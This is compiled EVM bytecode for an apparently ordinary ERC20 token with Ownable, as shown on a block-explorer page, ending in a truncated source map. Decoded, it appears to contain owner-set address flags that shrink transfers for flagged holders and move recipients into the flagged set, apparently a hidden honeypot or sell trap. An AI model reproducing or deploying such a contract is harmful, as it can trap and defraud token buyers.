60045260246000fd5b905060200201602081019061083b919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061089790612087565b9150506107dc565b5061097a565b60038360ff1614156109795760005b82829050811015610977576000600260008585858181106108fe577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610913919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061096f90612087565b9150506108b4565b505b5b5b5b505050565b61099261098c610e95565b82611398565b50565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060078054610a4390612055565b80601f0160208091040260200160405190810160405280929190818152602001828054610a6f90612055565b8015610abc5780601f10610a9157610100808354040283529160200191610abc565b820191906000526020600020905b815481529060010190602001808311610a9f57829003601f168201915b5050505050905090565b6000610b89610ad3610e95565b84610b84856040518060600160405280602581526020016122246025913960046000610afd610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b610e9d565b6001905092915050565b6000610ba7610ba0610e95565b8484611068565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c96610e95565b73ffffffffffffffffffffffffffffffffffffffff16610cb461136f565b73ffffffffffffffffffffffffffffffffffffffff1614610d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0190611de6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7190611d66565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000808284610e469190611eb8565b905083811015610e8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8290611da6565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0490611e46565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7490611d86565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161105b9190611e66565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156110d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110cf90611e26565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611148576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113f90611d46565b60405180910390fd5b600061115584848461153c565b90506111c3826040518060600160405280602681526020016121d660269139600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061125881600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506112a68484846115ff565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113039190611e66565b60405180910390a350505050565b6000838311158290611359576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113509190611d24565b60405180910390fd5b5082846113669190611f99565b90509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611408576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ff90611e06565b60405180910390fd5b611474816040518060600160405280602281526020016121b460229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506114cc8160055461170790919063ffffffff16565b600581905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115309190611e66565b60405180910390a35050565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115df5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156115f4576115ed82611760565b90506115f8565b8190505b9392505050565b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611702576000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b505050565b60008282111561174c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174390611dc6565b60405180910390fd5b81836117589190611f99565b905092915050565b600062066a44611b39836117749190611f3f565b61177e9190611f0e565b9050919050565b6000813590506117948161216e565b92915050565b60008083601f8401126117ac57600080fd5b8235905067ffffffffffffffff8111156117c557600080fd5b6020830191508360208202830111156117dd57600080fd5b9250929050565b6000813590506117f381612185565b92915050565b6000813590506118088161219c565b92915050565b60006020828403121561182057600080fd5b600061182e84828501611785565b91505092915050565b6000806040838503121561184a57600080fd5b600061185885828601611785565b925050602061186985828601611785565b9150509250929050565b60008060006060848603121561188857600080fd5b600061189686828701611785565b93505060206118a786828701611785565b92505060406118b8868287016117e4565b9150509250925092565b600080604083850312156118d557600080fd5b60006118e385828601611785565b92505060206118f4858286016117e4565b9150509250929050565b60006020828403121561191057600080fd5b600061191e848285016117e4565b91505092915050565b60008060006040848603121561193c57600080fd5b600061194a868287016117f9565b935050602084013567ffffffffffffffff81111561196757600080fd5b6119738682870161179a565b92509250509250925092565b61198881611fdf565b82525050565b600061199982611e9c565b6119a38185611ea7565b93506119b3818560208601612022565b6119bc8161215d565b840191505092915050565b60006119d4602383611ea7565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611a3a602683611ea7565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611aa0602283611ea7565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611b06601b83611ea7565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000611b46601e83611ea7565b91507f536166654d6174683a207375627472616374696f6e206f766572666c6f7700006000830152602082019050919050565b6000611b86602083611ea7565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611bc6602183611ea7565b91507f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008301527f73000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611c2c602583611ea7565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611c92602483611ea7565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b611cf48161200b565b82525050565b611d0381612015565b82525050565b6000602082019050611d1e600083018461197f565b92915050565b60006020820190508181036000830152611d3e818461198e565b905092915050565b60006020820190508181036000830152611d5f816119c7565b9050919050565b60006020820190508181036000830152611d7f81611a2d565b9050919050565b60006020820190508181036000830152611d9f81611a93565b9050919050565b60006020820190508181036000830152611dbf81611af9565b9050919050565b60006020820190508181036000830152611ddf81611b39565b9050919050565b60006020820190508181036000830152611dff81611b79565b9050919050565b60006020820190508181036000830152611e1f81611bb9565b9050919050565b60006020820190508181036000830152611e3f81611c1f565b9050919050565b60006020820190508181036000830152611e5f81611c85565b9050919050565b6000602082019050611e7b6000830184611ceb565b92915050565b6000602082019050611e966000830184611cfa565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611ec38261200b565b9150611ece8361200b565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611f0357611f026120d0565b5b828201905092915050565b6000611f198261200b565b9150611f248361200b565b925082611f3457611f336120ff565b5b828204905092915050565b6000611f4a8261200b565b9150611f558361200b565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611f8e57611f8d6120d0565b5b828202905092915050565b6000611fa48261200b565b9150611faf8361200b565b925082821015611fc257611fc16120d0565b5b828203905092915050565b6000611fd882611feb565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015612040578082015181840152602081019050612025565b8381111561204f576000848401525b50505050565b6000600282049050600182168061206d57607f821691505b602082108114156120815761208061212e565b5b50919050565b60006120928261200b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156120c5576120c46120d0565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b61217781611fcd565b811461218257600080fd5b50565b61218e8161200b565b811461219957600080fd5b50565b6121a581612015565b81146121b057600080fd5b5056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b3e031baac88df2415dbfc027955195882d43cef70c6ba579468dd24f900699b64736f6c63430008000033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80636db54b5a11610097578063a9059cbb11610066578063a9059cbb146102d5578063d8bff5a514610305578063dd62ed3e14610335578063f2fde38b1461036557610100565b80636db54b5a1461022757806370a082311461025757806395d89b4114610287578063a457c2d7146102a557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf5780633fa013d6146101ef57806342966c681461020b57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610381565b60405161011a9190611d24565b60405180910390f35b61013d600480360381019061013891906118c2565b610413565b60405161014a9190611d09565b60405180910390f35b61015b610431565b6040516101689190611e66565b60405180910390f35b61018b60048036038101906101869190611873565b61043b565b6040516101989190611d09565b60405180910390f35b6101a9610514565b6040516101b69190611e81565b60405180910390f35b6101d960048036038101906101d491906118c2565b61052b565b6040516101e69190611d09565b60405180910390f35b61020960048036038101906102049190611927565b6105de565b005b610225600480360381019061022091906118fe565b610981565b005b610241600480360381019061023c919061180e565b610995565b60405161024e9190611d09565b60405180910390f35b610271600480360381019061026c919061180e565b6109eb565b60405161027e9190611e66565b60405180910390f35b61028f610a34565b60405161029c9190611d24565b60405180910390f35b6102bf60048036038101906102ba91906118c2565b610ac6565b6040516102cc9190611d09565b60405180910390f35b6102ef60048036038101906102ea91906118c2565b610b93565b6040516102fc9190611d09565b60405180910390f35b61031f600480360381019061031a919061180e565b610bb1565b60405161032c9190611d09565b60405180910390f35b61034f600480360381019061034a9190611837565b610c07565b60405161035c9190611e66565b60405180910390f35b61037f600480360381019061037a919061180e565b610c8e565b005b60606006805461039090612055565b80601f01602080910402602001604051908101604052809291908181526020018280546103bc90612055565b80156104095780601f106103de57610100808354040283529160200191610409565b820191906000526020600020905b8154815290600101906020018083116103ec57829003601f168201915b5050505050905090565b6000610427610420610e95565b8484610e9d565b6001905092915050565b6000600554905090565b6000610448848484611068565b61050984610454610e95565b610504856040518060600160405280602881526020016121fc60289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104ba610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b610e9d565b600190509392505050565b6000600860009054906101000a900460ff16905090565b60006105d4610538610e95565b846105cf8560046000610549610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b610e9d565b6001905092915050565b6105e661136f565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461061d57600080fd5b60008360ff1614156106f55760005b828290508110156106ef57600160036000858585818110610676577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b905060200201602081019061068b919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106e790612087565b91505061062c565b5061097c565b60018360ff1614156107cd5760005b828290508110156107c75760006003600085858581811061074e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610763919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107bf90612087565b915050610704565b5061097b565b60028360ff1614156108a55760005b8282905081101561089f57600160026000858585818110610826577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b905060200201602081019061083b919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061089790612087565b9150506107dc565b5061097a565b60038360ff1614156109795760005b82829050811015610977576000600260008585858181106108fe577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610913919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061096f90612087565b9150506108b4565b505b5b5b5b505050565b61099261098c610e95565b82611398565b50565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060078054610a4390612055565b80601f0160208091040260200160405190810160405280929190818152602001828054610a6f90612055565b8015610abc5780601f10610a9157610100808354040283529160200191610abc565b820191906000526020600020905b815481529060010190602001808311610a9f57829003601f168201915b5050505050905090565b6000610b89610ad3610e95565b84610b84856040518060600160405280602581526020016122246025913960046000610afd610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b610e9d565b6001905092915050565b6000610ba7610ba0610e95565b8484611068565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c96610e95565b73ffffffffffffffffffffffffffffffffffffffff16610cb461136f565b73ffffffffffffffffffffffffffffffffffffffff1614610d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0190611de6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7190611d66565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000808284610e469190611eb8565b905083811015610e8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8290611da6565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0490611e46565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7490611d86565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161105b9190611e66565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156110d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110cf90611e26565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611148576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113f90611d46565b60405180910390fd5b600061115584848461153c565b90506111c3826040518060600160405280602681526020016121d660269139600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061125881600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506112a68484846115ff565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113039190611e66565b60405180910390a350505050565b6000838311158290611359576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113509190611d24565b60405180910390fd5b5082846113669190611f99565b90509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611408576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ff90611e06565b60405180910390fd5b611474816040518060600160405280602281526020016121b460229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113119092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506114cc8160055461170790919063ffffffff16565b600581905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115309190611e66565b60405180910390a35050565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115df5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156115f4576115ed82611760565b90506115f8565b8190505b9392505050565b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611702576000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b505050565b60008282111561174c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174390611dc6565b60405180910390fd5b81836117589190611f99565b905092915050565b600062066a44611b39836117749190611f3f565b61177e9190611f0e565b9050919050565b6000813590506117948161216e565b92915050565b60008083601f8401126117ac57600080fd5b8235905067ffffffffffffffff8111156117c557600080fd5b6020830191508360208202830111156117dd57600080fd5b9250929050565b6000813590506117f381612185565b92915050565b6000813590506118088161219c565b92915050565b60006020828403121561182057600080fd5b600061182e84828501611785565b91505092915050565b6000806040838503121561184a57600080fd5b600061185885828601611785565b925050602061186985828601611785565b9150509250929050565b60008060006060848603121561188857600080fd5b600061189686828701611785565b93505060206118a786828701611785565b92505060406118b8868287016117e4565b9150509250925092565b600080604083850312156118d557600080fd5b60006118e385828601611785565b92505060206118f4858286016117e4565b9150509250929050565b60006020828403121561191057600080fd5b600061191e848285016117e4565b91505092915050565b60008060006040848603121561193c57600080fd5b600061194a868287016117f9565b935050602084013567ffffffffffffffff81111561196757600080fd5b6119738682870161179a565b92509250509250925092565b61198881611fdf565b82525050565b600061199982611e9c565b6119a38185611ea7565b93506119b3818560208601612022565b6119bc8161215d565b840191505092915050565b60006119d4602383611ea7565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611a3a602683611ea7565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611aa0602283611ea7565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611b06601b83611ea7565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6000611b46601e83611ea7565b91507f536166654d6174683a207375627472616374696f6e206f766572666c6f7700006000830152602082019050919050565b6000611b86602083611ea7565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611bc6602183611ea7565b91507f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008301527f73000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611c2c602583611ea7565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611c92602483611ea7565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b611cf48161200b565b82525050565b611d0381612015565b82525050565b6000602082019050611d1e600083018461197f565b92915050565b60006020820190508181036000830152611d3e818461198e565b905092915050565b60006020820190508181036000830152611d5f816119c7565b9050919050565b60006020820190508181036000830152611d7f81611a2d565b9050919050565b60006020820190508181036000830152611d9f81611a93565b9050919050565b60006020820190508181036000830152611dbf81611af9565b9050919050565b60006020820190508181036000830152611ddf81611b39565b9050919050565b60006020820190508181036000830152611dff81611b79565b9050919050565b60006020820190508181036000830152611e1f81611bb9565b9050919050565b60006020820190508181036000830152611e3f81611c1f565b9050919050565b60006020820190508181036000830152611e5f81611c85565b9050919050565b6000602082019050611e7b6000830184611ceb565b92915050565b6000602082019050611e966000830184611cfa565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611ec38261200b565b9150611ece8361200b565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611f0357611f026120d0565b5b828201905092915050565b6000611f198261200b565b9150611f248361200b565b925082611f3457611f336120ff565b5b828204905092915050565b6000611f4a8261200b565b9150611f558361200b565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611f8e57611f8d6120d0565b5b828202905092915050565b6000611fa48261200b565b9150611faf8361200b565b925082821015611fc257611fc16120d0565b5b828203905092915050565b6000611fd882611feb565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015612040578082015181840152602081019050612025565b8381111561204f576000848401525b50505050565b6000600282049050600182168061206d57607f821691505b602082108114156120815761208061212e565b5b50919050565b60006120928261200b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156120c5576120c46120d0565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b61217781611fcd565b811461218257600080fd5b50565b61218e8161200b565b811461219957600080fd5b50565b6121a581612015565b81146121b057600080fd5b5056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b3e031baac88df2415dbfc027955195882d43cef70c6ba579468dd24f900699b64736f6c63430008000033

Deployed Bytecode Sourcemap

2200:1198:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2010:89:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2870:166;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2299:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4085:317;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2204:89;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5545:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2454:719:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2367:81;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3287:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2416:125:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2105:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4889:266;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3446:172;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3179:102:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3094:149:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2349:240:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2010:89:0;2055:13;2087:5;2080:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2010:89;:::o;2870:166::-;2953:4;2969:39;2978:12;:10;:12::i;:::-;2992:7;3001:6;2969:8;:39::i;:::-;3025:4;3018:11;;2870:166;;;;:::o;2299:106::-;2360:7;2386:12;;2379:19;;2299:106;:::o;4085:317::-;4191:4